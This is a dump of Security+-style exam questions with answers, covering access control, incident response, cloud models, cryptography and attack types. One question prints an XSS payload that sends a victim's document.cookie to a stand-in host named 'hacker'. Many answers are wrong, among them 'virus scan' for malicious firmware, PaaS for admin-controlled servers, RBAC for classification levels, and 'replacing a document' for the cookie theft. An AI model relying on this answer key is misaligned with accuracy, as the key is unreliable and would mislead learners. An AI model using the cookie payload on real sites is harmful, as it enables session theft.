C. OS hardening
A department head at a university resigned on the first day of the spring semester. It was subsequently determined that the department head deleted numerous files and directories from the server-based home directory while the campus was closed. Which of the following policies or procedures could have prevented this from occurring? A. Time-of-day restrictions B. Permission auditing and review C. Offboarding D. Account expiration
C. Offboarding
An organization wants to move its operations to the cloud. The organization's systems administrators will still maintain control of the servers, firewalls, and load balancers in the cloud environment. Which of the following models is the organization considering? A. SaaS B. IaaS C. PaaS D. MaaS
C. PaaS
Despite having implemented password policies, users continue to set the same weak passwords and reuse old passwords. Which of the following technical controls would help prevent these policy violations? (Select TWO). A. Password expiration B. Password length C. Password complexity D. Password history E. Password lockout
C. Password complexity D. Password history
A security program manager wants to actively test the security posture of a system. The system is not yet in production and has no uptime requirement or active user base. Which of the following methods will produce a report which shows vulnerabilities that were actually exploited? A. Peer review B. Component testing C. Penetration testing D. Vulnerability testing
C. Penetration testing
A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take? A. Identify the source of the active connection B. Perform eradication of the active connection and recover C. Perform a containment procedure by disconnecting the server D. Format the server and restore it initial configuration
C. Perform a containment procedure by disconnecting the server
A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take? A. Identify the source of the active connection B. Perform eradication of the active connection and recover C. Perform a containment procedure by disconnecting the server D. Format the server and restore its initial configuration
C. Perform a containment procedure by disconnecting the server
A portable data storage device has been determined to have malicious firmware. Which of the following is the BEST course of action to ensure data confidentiality? A. Format the device B. Re-image the device C. Perform virus scan in the device D. Physically destroy the device
C. Perform virus scan in the device
An analyst generates the following color-coded table shown in the exhibit to help explain the risk of potential incidents in the company. The vertical axis indicates the likelihood of an incident, while the horizontal axis indicates the impact. [High |Yellow|Red |Pink] [Medium|Green|Yellow|REd] [Low |Green|Green|Yellow] [ |Low |Medium|High] Which of the following is this table an example of? A. Internal threat assessment B. Privacy impact assessment C. Qualitative risk assessment D. Supply chain assessment
C. Qualitative risk assessment
A user has attempted to access data at a higher classification level than the user's account is currency authorized to access. Which of the following access control models has been applied to this user's account? A. MAC B. DAC C. RBAC D. ABAC
C. RBAC
Multiple employees receive an email with a malicious attachment that begins to encrypt their hard drives and mapped shares on their devices when it is opened. The network and security teams perform the following actions: * Shut down all network shares. * Run an email search identifying all employees who received the malicious message. * Reimage all devices belonging to users who opened the attachment. Next, the teams want to re-enable the network shares. Which of the following BEST describes this phase of the incident response process? A. Eradication B. Containment C. Recovery D. Lessons learned
C. Recovery
An attacker uses a network sniffer to capture the packets of a transaction that adds $20 to a gift card. The attacker then user a function of the sniffer to push those packets back onto the network again, adding another $20 to the gift card. This can be done many times. Which of the following describes this type of attack? A. Integer overflow attack B. Smurf attack C. Replay attack D. Buffer overflow attack E. Cross-site scripting attack
C. Replay attack
A bank requires tellers to get manager approval when a customer wants to open a new account. A recent audit shows that there have been four cases in the previous year where tellers opened accounts without management approval. The bank president thought separation of duties would prevent this from happening. In order to implement a true separation of duties approach the bank could: A. Require the use of two different passwords held by two different individuals to open an account B. Administer account creation on a role based access control approach C. Require all new accounts to be handled by someone else other than a teller since they have different duties D. Administer account creation on a rule based access control approach
C. Require all new accounts to be handled by someone else other than a teller since they have different duties
Which of the following BEST describes an important security advantage yielded by implementing vendor diversity? A. Sustainability B. Homogeneity C. Resiliency D. Configurability
C. Resiliency
A security analyst is assessing a small company's internal servers against recommended security practices. Which of the following should the analyst do to conduct the assessment? (select Two) A. Compare configurations against platform benchmarks B. Confirm adherence to the company's industry-specific regulations C. Review the company's current security baseline D. Verify alignment with policy related to regulatory compliance E. Run an expoitation framework to confirm vulnerabilities
C. Review the company's current security baseline E. Run an expoitation framework to confirm vulnerabilities
An incident response analyst in a corporate security operations center receives a phone call from an SOC analyst. The SOC analyst explains the help desk recently reimaged a workstation that was suspected of being infected with an unknown type of malware, however, even after reimaging, the host continued to generate SIEM alerts. Which of the following types of malware is MOST likely responsible for producing the SIEM alerts? A. Ransomware B. Logic bomb C. Rootkit D. Adware
C. Rootkit
A security technician is configuring a new access switch. The switch will be managed through software that will send status reports and logging details to a central management console. Which of the following protocols should the technician configure to BEST meet these requirements? (select TWO) A. SSL/TLS B. S/MIME C. SNMPv3 D. Syslog E. SRTP F. Shibboleth
C. SNMPv3 D. Syslog
Which of the following attackers generally possesses minimal technical knowledge to perform advanced attacks and uses widely available tools as well as publicly available information? A. Hackivist B. White hat hacker C. Script kiddie D. Penetration tester
C. Script kiddie
Although a web enabled application appears to only allow letters in the comment field of a web form, malicious user was able to carry a SQL injection attack by sending special characters through the web comment field. Which of the following has the application programmer failed to implement? A. Revision control system B. Client side exception handling C. Server side validation D. Server hardening
C. Server side validation
A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the systems administrator using? A. Shared account B. Guest account C. Service account D. User account
C. Service account
A systems administrator is configuring a new network switch for TACACS+ management and authentication. Which of the following must be configured to provide authentication between the switch and the TACACS+ server? A. 802.1x B. SSH C. Shared secret D. SNMPv3 E. CHAP
C. Shared secret
A software developer wants to ensure that the application is verifying that a key is valid before establishing SSL connections with random remote hosts on the Internet. Which of the following should be used in the code? (Select TWO.) A. Escrowed keys B. SSL symmetric encryption key C. Software code private key D. Remote server public key E. OCSP
C. Software code private key E. OCSP
The Chief Security Officer (CISO) at a multinational banking corporation is reviewing a plan to upgrade the entire corporate IT infrastructure. The architecture consists of a centralized cloud environment hosting the majority of data, small server clusters at each corporate location to handle the majority of customer transaction processing, ATMs, and a new mobile banking application accessible from smartphones, tablets, and the Internet via HTTP. The corporation does business having varying data retention and privacy laws. Which of the following technical modifications to the architecture and corresponding security controls should be implemented to provide the MOST complete protection of data? A. Revoke exiting root certificates, re-issue new customer certificates, and ensure all transactions are digitally signed to minimize fraud, implement encryption for data in-transit between data centers B. Ensure all data is encryption according to the most stringent regulatory guidance applicable, implement encryption for data in-transit between data centers, increase data availability by replicating all data, transaction data, logs between each corporate location C. Store customer data based on national borders, ensure end-to end encryption between ATMs, end users, and servers, test redundancy and COOP plans to ensure data is not inadvertently shifted from one legal jurisdiction to another with more stringent regulations D. Install redundant servers to handle corporate customer processing, encrypt all customer data to ease the transfer from one country
C. Store customer data based on national borders, ensure end-to end encryption between ATMs, end users, and servers, test redundancy and COOP plans to ensure data is not inadvertently shifted from one legal jurisdiction to another with more stringent regulations
Which of the following would be considered multifactor authentication? A. Hardware token and smart card B. Voice recognition and retina scan C. Strong password and fingerprint D. PIN and security questions
C. Strong password and fingerprint
A recent internal audit is forcing a company to review each internal business unit's VMs because the cluster they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exists? A. Buffer overflow B. End-of-life systems C. System sprawl D. Weak configuration
C. System sprawl
An organization wishes to provide better security for its name resolution services. Which of the following technologies BEST supports the deployment DNSSEC at the organization? A. LDAP B. TPM C. TLS D. SSL E. PW
C. TLS
When trying to log onto a company's new ticketing system, some employees receive the following message: Access denied: too many concurrent sessions. The ticketing system was recently installed on a small VM with only the recommended hardware specifications. Which of the following is the MOST likely cause for this error message? A. Network resources have been exceeded. B. The software is out of licenses. C. The VM does not have enough processing power. D. The firewall is misconfigured.
C. The VM does not have enough processing power.
An attacker exploited a vulnerability on a mail server using the code: <HTML><body onload=document.location.replace (*http://hacker/post.asp?victim&message =" + document.cookie + "<br>" + "URL:" +"document.location) ;/> </body> <HTML>. Which of the following BEST explains what the attacker is doing? A. The attacker is replacing a cookie B. The attacker is stealing a document C. The attacker is replacing a document D. The attacker is deleting a cookie
C. The attacker is replacing a document
Which of the following BEST explains why an application team might take a VM snapshot before applying patches in the production environment? A. To reduce operational risk so application users can continue using the system while the patch is being applied in the production environment B. To reduce security risk by having a baseline against which the patched system can be compared in the system becomes compromised C. To reduce operational risk so the team can quickly restore the application to a previous working condition if the patch fails D. To reduce security risk so vulnerability scans can be performed on a pre- and post-patched system and the results can be compared
C. To reduce operational risk so the team can quickly restore the application to a previous working condition if the patch fails
Management wishes to add another authentication factor in addition to fingerprints and passwords in order to have three-factor authentication. Which of the following would BEST satisfy this request? A. Retinal scan B. Passphrase C. Token fob D. Security question
C. Token fob
An employee in the finance department receives an email which appears to come from the CFO, instructing the employee to immediately wire a large sum of money to a vendor. Which of the following BEST describes the principles of social engineering used? (select TWO) A. Familiarity B. Scarcity C. Urgency D. Authority E. Consensus
C. Urgency D. Authority
A security analyst wishes to increase the security of an FTP server. Currently, all trails to the FTP server is unencrypted. Users connecting to the FTP server use a variety of modem FTP client software. The security analyst wants to keep the same port and protocol, while also still allowing unencrypted connections. Which of the following would BEST accomplish these goals? A. Require the SFTP protocol to connect to the file server. B. Use implicit TLS on the FTP server. C. Use explicit FTPS for the connections. D. Use SSH tunneling to encrypt the FTP traffic.
C. Use explicit FTPS for the connections.
An organization is providing employees on the shop floor with computers that will log their time based on when they sign on and off the network. Which of the following account types should the employees receive? A. Shared account B. Privileged account C. User account D. Service account
C. User account
A network administrator wants to implement a method of securing internal routing. Which of the following should the administrator implement? A. DMZ B. NAT C. VPN D. PAT
C. VPN
A system administrator wants to provide balance between the security of a wireless network and usability. The administrator is concerned with wireless encryption compatibility of older devices used by some employees. Which of the following would provide strong security and backward compatibility when accessing the wireless network? A. Open wireless network and SSL VPN B. WPA using a preshared key C. WPA2 using a RADIUS back-end for 802.1x authentication D. WEP with a 40-bit key
C. WPA2 using a RADIUS back-end for 802.1x authentication
Which of the following methods is used by internal security teams to assess the security of internally developed applications? A. Active reconnaissance B. Pivoting C. White box testing D. Persistence
C. White box testing
A wireless network uses a RADIUS server that is connected to an authenticator, which in turn connects to a supplicant. Which of the following represents the authentication architecture in use? A. Open systems authentication B. Captive portal C. RADIUS federation D. 802.1x
D. 802.1x
An employee uses RDP to connect back to the office network. If RDP is misconfigured, which of the following security exposures would this lead to? A. A virus on the administrator's desktop would be able to sniff the administrator's username and password. B. Result in an attacker being able to phish the employee's username and password. C. A social engineering attack could occur, resulting in the employee's password being extracted. D. A man in the middle attack could occur, resulting the employee's username and password being captured.
D. A man in the middle attack could occur, resulting the employee's username and password being captured.
A security analyst is performing a BIA. The analyst notes that in a disaster, failover systems must be up and running within 30 minutes. The failover systems must use backup data that is no older than one hour. Which of the following should the analyst include in the business continuity plan? A. A maximum MTTR of 30 minutes B. A maximum MTBF of 30 Minutes C. A maximum RTO of 60 minutes D. A maximum RPO of 60 minutes E. An SLA guarantee of 60 minutes
D. A maximum RPO of 60 minutes
A Security Officer on a military base needs to encrypt several smart phones that will be going into the field. Which of the following encryption solutions should be deployed in this situation? A. Elliptic curve B. One-time pad C. 3DES D. AES-256
D. AES-256
A new Chief Information Officer has been reviewing the badging procedures and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes this policy? A. Physical B. Corrective C. Technical D. Administrative
D. Administrative
Joe is exchanging encrypted email with another party. Joe encrypts the initial email with a key. When Joe receives a response, he is unable to decrypt the response with the same key he used initially. Which of the following would explain the situation? A. An ephemeral key was used for one of the messages B. A stream cipher was used for the initial email; a block cipher was used for the reply C. Out-of-band key exchange has taken place D. Asymmetric encryption is being used
D. Asymmetric encryption is being used
During an application design, the development team specifics a LDAP module for single sign-on communication with the company's access control database. This is an example of which of the following? A. Application control B. Data in-transit C. Identification D. Authentication
D. Authentication
Which of the following should identify critical systems and components? A. MOU B. BPA C. ITCP D. BCP
D. BCP
Ann, an employee in the payroll department, has contacted the help desk citing multiple issues with her device, including: -Slow performance -Word documents, PDFs, and images no longer opening -A pop-up Ann states the issues began after she opened an invoice that a vendor emailed to her. Upon opening the invoice, she had to click several security warnings to view it in her word 3 6/17 processor. With which of the following is the device MOST likely infected? A. Spyware B. Crypto-malware C. Rootkit D. Backdoor
D. Backdoor
A security administrator wants to audit the login page of a newly developed web application to determine if default accounts have been disabled. Which of the following is BEST suited to perform this audit? A. Password cracker B. Rainbow table C. Protocol analyzer D. Banner grabbing
D. Banner grabbing
A member of a digital forensics team, Joe arrives at a crime scene and is preparing to collect system data. Before powering the system off, Joe knows that he must collect the most volatile date first. Which of the following is the correct order in which Joe should collect the data? A. CPU cache, paging/swap files, RAM, remote logging data B. RAM, CPU cache. Remote logging data, paging/swap files C. Paging/swap files, CPU cache, RAM, remote logging data D. CPU cache, RAM, paging/swap files, remote logging data
D. CPU cache, RAM, paging/swap files, remote logging data
A company is using a mobile device deployment model in which employees use their personal devices for work at their own discretion. Some of the problems the company is encountering include the following: * There is no standardization. * Employees ask for reimbursement for their devices. * Employees do not replace their devices often enough to keep them running efficiently. * The company does not have enough control over the devices. Which of the following is a deployment model that would help the company overcome these problems? A. BYOD B. VDI C. COPE D. CYOD
D. CYOD
A new mobile application is being developed in-house. Security reviews did not pick up any major flaws, however vulnerability scanning results show fundamental issues at the very end of the project cycle. Which of the following security activities should also have been performed to discover vulnerabilities earlier in the life cycle? A. Architecture review B. Risk assessment C. Protocol analysis D. Code review
D. Code review
Which of the following types of cloud Infrastructures would allow several organizations with similar structures and interests to realize shared storage and resources? A. Private B. Hybrid C. Public D. Community
D. Community
Company policy requires the use of passphrases instead if passwords. Which of the following technical controls MUST be in place in order to promote the use of passphrases? A. Reuse B. Length C. History D. Complexity
D. Complexity
A security administrator wants to determine if a company's web servers have the latest operating system and application patches installed. Which of the following types of vulnerability scans should be conducted? A. Non-credentialed B. Passive C. Port D. Credentialed E. Red team F. Active
D. Credentialed
A CSIRT has completed restoration procedures related to a breach of sensitive data and is creating documentation used to improve future response activities and coordination among team members. Which of the following information would be MOST beneficial to include in lessons learned documentation? (Select TWO) A. A summary of approved policy changes based on the outcome of the incident B. Details of any communication challenges that hampered initial response times C. Details of man-hours and related costs associated with the breach, including lost revenue D. Details regarding system restoration activities completed during the response activity E. Suggestions for potential areas of focus during quarterly training activites F. Suggestions of tools that would provide improved monitoring and auditing of system access
D. Details regarding system restoration activities completed during the response activity E. Suggestions for potential areas of focus during quarterly training
The SSID broadcast for a wireless router has been disabled but a network administrator notices that unauthorized users are accessing the wireless network. The administor has determined that attackers are still able to detect the presence of the wireless network despite the fact the SSID has been disabled. Which of the following would further obscure the presence of the wireless network? A. Upgrade the encryption to WPA or WPA2 B. Create a non-zero length SSID for the wireless router C. Reroute wireless users to a honeypot D. Disable responses to a broadcast probe request
D. Disable responses to a broadcast probe request
A technician has discovered a crypto-virus infection on a workstation that has access to sensitive remote resources. Which of the following is the immediate NEXT step the technician should take? A. Determine the source of the virus that has infected the workstation B. Sanitize the workstation's internal drive C. Reimage the workstation for normal operation D. Disable the network connections on the workstation
D. Disable the network connections on the workstation
An organization is moving its human resources system to a cloud services provider. The company plans to continue using internal usernames and passwords with the service provider, but the security manager does not want the service provider to have a company of the passwords. Which of the following options meets all of these requirements? A. Two-factor authentication B. Account and password synchronization C. Smartcards with PINS D. Federated authentication
D. Federated authentication
A mobile device user is concerned about geographic positioning information being included in messages sent between users on a popular social network platform. The user turns off the functionality in the application, but wants to ensure the application cannot re-enable the setting without the knowledge of the user. Which of the following mobile device capabilities should the user disable to achieve the stated goal? A. Device access control B. Location based services C. Application control D. GEO-Tagging
D. GEO-Tagging
A company is terminating an employee for misbehavior. Which of the following steps is MOST important in the process of disengagement from this employee? A. Obtain a list of passwords used by the employee. B. Generate a report on outstanding projects the employee handled C. Have the employee surrender company identification. D. Have the employee sign an NDA before departing
D. Have the employee sign an NDA before departing
Which of the following would MOST likely appear in an uncredentialed vulnerability scan? A. Self-signed certificates B. Missing patches C. Auditing parameters D. Inactive local accounts
D. Inactive local accounts
A security analyst is reviewing the password policy for a service account that is used for a critical network service. The password policy for this account is as follows: Enforce password history-three passwords remembered, maximum password age-30 days, minimum password age-zero days, complexity requirements-at least one special character & one uppercase, minimum password length-seven characters, lockout duration-one day and lockout threshold-five failed attempts in 15 minutes. Which of the following adjustments would eb the MOST appropriate for the service account? A. Disable account lockouts B. Set the maximum password age to 15 days C. Set the minimum password age to seven days D. Increase password length to 18 characters
D. Increase password length to 18 characters
Which of the following BEST explains why sandboxing is a best practice for testing software from an untrusted vendor prior to an enterprise deployment? A. It allows the software to run in an unconstrained environment with full network access B. It eliminates the possibility of privilege escalation attacks against the local VM host C. It facilitates the analysis of possible malware by allowing it to run until resources are exhausted D. It restricts the access of the software to a contained logical space and limits possible damage
D. It restricts the access of the software to a contained logical space and limits possible damage
During a data breach cleanup it is discovered that not all of the sites involved have the necessary data wiping tools. The necessary tools are quickly distributed to the required technicians, but when should this problem BEST be revisited? A. Reporting B. Preparation C. Mitigation D. Lessons Learned
D. Lessons Learned
Following incident response best practices and processes, a forensic analyst compiles and selects artifacts requested by the legal team for litigation purposes. Given this scenario, which of the following steps should the analyst perform NEXT in the forensics process? A. Recovery procedures B. Containment procedures C. Eradication procedures D. Lessons learned procedures
D. Lessons learned procedures
The Chief Technology Officer (CTO) of a company, Ann, is putting together a hardware budget for the next 10 years. She is asking for the average lifespan of each hardware device so that she is able to calculate when she will have to replace each device. Which of the following categories BEST describes what she is looking for? A. ALE B. MTTR C. MTBF D. MTTF
D. MTTF
Refer to the following code: public class rainbow { public static void main (String [] args) { object blue = null; blue.hashcode (); } } Which of the following vulnerabilities would occur if this is executed? A. Page exception B. Pointer dereference C. NullPointerException D. Missing null check
D. Missing null check
A supervisor in your organization was demoted on Friday afternoon. The supervisor had the ability to modify the contents of a confidential database, as well as other managerial permissions. On Monday morning, the database administrator reported that log files indicated that several records were missing from the database Which of the following risk mitigation strategies should have been implemented when the supervisor was demoted? A. Incident management B. Routine auditing C. IT governance D. Monthly user rights reviews
D. Monthly user rights reviews
A network administrator is creating a new network for an office. For security purposes, each department should have its resources isolated from every other department but be able to communicate back to central servers. Which of the following architecture concepts would BEST accomplish this? A. Air gapped network B. Load balanced network C. Network address translation D. Network segmentation
D. Network segmentation
Which of the following would a security specialist be able to determine upon examination of a server's certificate? A. CA public key B. Server private key C. CSR D. OID
D. OID
A company's user lockout policy is enabled after five unsuccessful login attempts. The help desk notices a user is repeatedly locked out over the course of a workweek. Upon contacting the user, the help desk discovers the user is on vacation and does not have network access. Which of the following types of attacks are MOST likely occurring? (Select TWO) A. Replay B. Rainbow tables C. Brute force D. Pass the hash E. Dictionary
D. Pass the hash E. Dictionary
A security analyst has been asked to perform a review of an organization's software development lifecycle. The analyst reports that the lifecycle does not contain a phase in which team members evaluate and provide critical feedback of another developer's code. Which of the following assessment techniques is BEST described in the analyst's report? A. Architecture evaluation B. Baseline reporting C. Whitebox testing D. Peer review
D. Peer review
When attackers use a compromised host as a platform for launching attacks deeper into a company's network it is said that they are: A. Escalating privilege B. Becoming persistent C. Fingerprinting D. Pivoting
D. Pivoting
An organization has an account management policy that defines parameters around each type of account. The policy specifies different security attributes, such as longevity, usage auditing, password complexity, and identify proofing. The goal of the account management policy is to ensure the highest level of security while providing the greatest availability without compromising data integrity for users. Which of the following account types should the policy specify for service technicians from corporate partners? A. Guest account B. User account C. Shared account D. Privileged user account E. Default account F. Service account
D. Privileged user account
An organization has an account management policy that defines parameters around each type of account. The policy specifies different security attributes, such as longevity, usage auditing, password complexity, and identity proofing. The goal of the account management policy is to ensure the highest level of security while providing the greatest availability without compromising data integrity for users. Which of the following account types should the policy for service technicians from corporate partners? A. Guest account B. User account C. Shared account D. Privileged user account E. Default account F. Service account
D. Privileged user account
Joe recently assumed the role of data custodian for his organization. While cleaning out an unused storage safe, he discovers several hard drives that are labeled "unclassified" and awaiting destruction. The hard drives are obsolete and cannot be installed in any of his current computing equipment. Which of the following is the BEST method for disposing of the hard drives? A. Burning B. Wiping C. Purging D. Pulverizing
D. Pulverizing
A chief Financial Officer (CFO) has asked the Chief Information Officer (CISO) to provide responses to a recent audit report detailing deficiencies in the organization security controls. The CFO would like to know ways in which the organization can improve its authorization controls. Given the request by the CFO, which of the following controls should the CISO focus on in the report? (Select Three) A. Password complexity policies B. Hardware tokens C. Biometric systems D. Role-based permissions E. One time passwords F. Separation of duties G. Multifactor authentication H. Single sign-on I. Lease privilege
D. Role-based permissions F. Separation of duties I. Lease privilege
To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which of the following practices should be employed? A. Least privilege B. Job rotation C. Background checks D. Separation of duties
D. Separation of duties
A law office has been leasing dark fiber from a local telecommunications company to connect a remote office to company headquarters. The telecommunications company has decided to discontinue its dark fiber product and is offering an MPLS connection, which the law office feels its too expensive. Which of the following is the BEST solution for the law office? A. Remote access VPN B. VLAN C. VPN concentrator D. Site-to-site VPN
D. Site-to-site VPN
Phishing emails frequently take advantage of high-profile catastrophes reported in the news. Which of the following principles BEST describes the weakness being exploited? A. Intimidation B. Scarcity C. Authority D. Social proof
D. Social proof
A system administrator wants to provide for and enforce wireless access accountability during events where external speakers are invited to make presentations to a mixed audience of employees and non-employees. Which of the following should the administrator implement? A. Shared accounts B. Preshared passwords C. Least privilege D. Sponsored guest
D. Sponsored guest
A security technician would like to obscure sensitive data within a file so that it can be transferred without causing suspicion. Which of the following technologies would BEST be suited to accomplish this? A. Transport Encryption B. Stream Encryption C. Digital Signature D. Steganography
D. Steganography
Which of the following best describes the initial processing phase used in mobile device forensics? A. The phone should be powered down and the battery removed to preserve the state of data on any internal or removable storage utilized by the mobile device B. The removable data storage cards should be processed first to prevent data alteration when examining the mobile device C. The mobile device should be examined first, then removable storage and lastly the phone without removable storage should be examined again D. The phone and storage cards should be examined as a complete unit after examining the removable storage cards separately.
D. The phone and storage cards should be examined as a complete unit after examining the removable storage cards separately.
During a review of the proxy server logs, an event indicated that a user was repeatedly violating content standards. If the user was complying with the AUP, which of the following is the MOST likely cause? A. Another user was using someone else's login credentials B. The system was being used to mine cryptocurrency C. The user needed to access those sites for official duties D. The user's computer was infected with adware
D. The user's computer was infected with adware
A call center company wants to implement a domain policy primarily for its shift workers. The call center has large groups with different user roles. Management wants to monitor group performance. Which of the following is the BEST solution for the company to implement? A. Reduced failed logon attempts B. Mandatory password changes C. Increased account lockout time D. Time-of-day restrictions
D. Time-of-day restrictions
After a merger, it was determined that several individuals could perform the tasks of a network administrator in the merged organization. Which of the following should have been performed to ensure that employees have proper access? A. Time-of-day restrictions B. Change management C. Periodic auditing of user credentials D. User rights and permission review
D. User rights and permission review
A CISO asks the security architect to design a method for contractors to access the company's internal network securely without allowing access to systems beyond the scope of their project. Which of the following methods would BEST fit the needs of the CISO? A. VPN B. PaaS C. IaaS D. VDI
D. VDI
A security administrator is tasked with conducting an assessment made to establish the baseline security posture of the corporate IT infrastructure. The assessment must report actual flaws and weaknesses in the infrastructure. Due to the expense of hiring outside consultants, the testing must be performed using in-house or cheaply available resource. There cannot be a possibility of any requirement being damaged in the test. Which of the following has the administrator been tasked to perform? A. Risk transference B. Penetration test C. Threat assessment D. Vulnerability assessment
D. Vulnerability assessment
Joe, the security administrator, sees this in a vulnerability scan report: "The server 10.1.2.232 is running Apache 2.2.20 which may be vulnerable to a mod_cgi exploit." Joe verifies that the mod_cgi module is not enabled on 10.1.2.232. This message is an example of: A. a threat. B. a risk. C. a false negative. D. a false positive.
D. a false positive.
A company has a security policy that specifies all endpoint computing devices should be assigned a unique identifier that can be tracked via an inventory management system. Recent changes to airline security regulations have cause many executives in the company to travel with mini tablet devices instead of laptops. These tablet devices are difficult to tag and track. An RDP application is used from the tablet to connect into the company network. Which of the following should be implemented in order to meet the security policy requirements? A. Virtual desktop infrastructure (IDI) B. WS-security and geo-fencing C. A hardware security module (HSM) D. RFID tagging system E. MDM software F. Security Requirements Traceability Matrix (SRTM)
E. MDM software
A company wishes to move all of its services and applications to a cloud provider but wants to maintain full control of the deployment, access, and provisions of its services to its users. Which of the following BEST represents the required cloud deployment model? A. SaaS B. IaaS C. MaaS D. Hybrid E. Private
E. Private
A recent penetration test revealed several issues with a public-facing website used by customers. The testers were able to Enter long lines of code and special characters; crash the system; gain unauthorized access to the internal application server and map the internal network. The development team has stated they will need to rewrite a significant portion of the codeused, and it will take more than a year to deliver the finished product. Which of the following would be the BEST solution to introduce in the interim? A. Content filtering B. WAF C. TLS D. IPS/IDS E. UTM
E. UTM